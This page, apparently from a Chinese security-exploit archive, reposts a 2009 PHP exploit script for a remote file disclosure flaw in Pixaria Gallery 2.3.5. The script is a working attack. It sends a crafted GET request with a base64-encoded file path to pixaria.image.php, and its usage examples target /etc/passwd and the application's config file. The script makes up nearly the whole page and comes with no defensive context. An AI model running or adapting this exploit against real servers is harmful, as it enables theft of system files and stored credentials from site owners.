Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit

来源：iqa[a]hotmail.fr 作者：Qabandi 发布时间：2009-07-27

<?php
ini_set("max_execution_time",0);
print_r('
                                       ||          ||   | ||
                                o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
                               ( : /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Pixaria Gallery 2.3.5          __/QQQ/````````````````\QQQ\___
Remote File Disclosure         _/QQQQQ/                  \QQQQQQ\
[q] _GET   <3                   /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] http://pixaria.com        |QQQQ/    By Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[hai]-                  \QQQQ\                      __ /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
                                         ```````````````````     `````
______________________________________________________________________________
/                                                                              \
|                          meh.....                                            |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
');

if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' VICTIM DIR FILE

example: php '.$argv[0].' EXAMPLE /demo/ /etc/passwd

or if in root dir:
example: php '.$argv[0].' EXAMPLE // /etc/passwd
php '.$argv[0].' EXAMPLE // ./pixaria.config.php
-----------------------------------------------------------------------------
');
die;
}
function QABANDI($victim,$vic_dir,$file){
$host = $victim;
$p = "http://".$host.$vic_dir;

$file2 = base64_encode($file);

          $packet ="GET ".$p."/pixaria.image.php?file=".$file2." HTTP/1.0\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Connection: Close\r\n\r\n";

$o = @fsockopen($host, 80);
if(!$o){
  echo "\n[x] No response...\n";
  die;
}

fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);

$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
  echo "\n[x] 404 Not Found... Make sure of path. \n";
  die;
}

return $data;

}

$host1 = $argv[1];
$userdir1=$argv[2];
$file= $argv[3];

if ($argc > 2) {

echo "Getting file Data....[i9bir]\n";
print_r(QABANDI($host1,$userdir1,$file));

}
?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告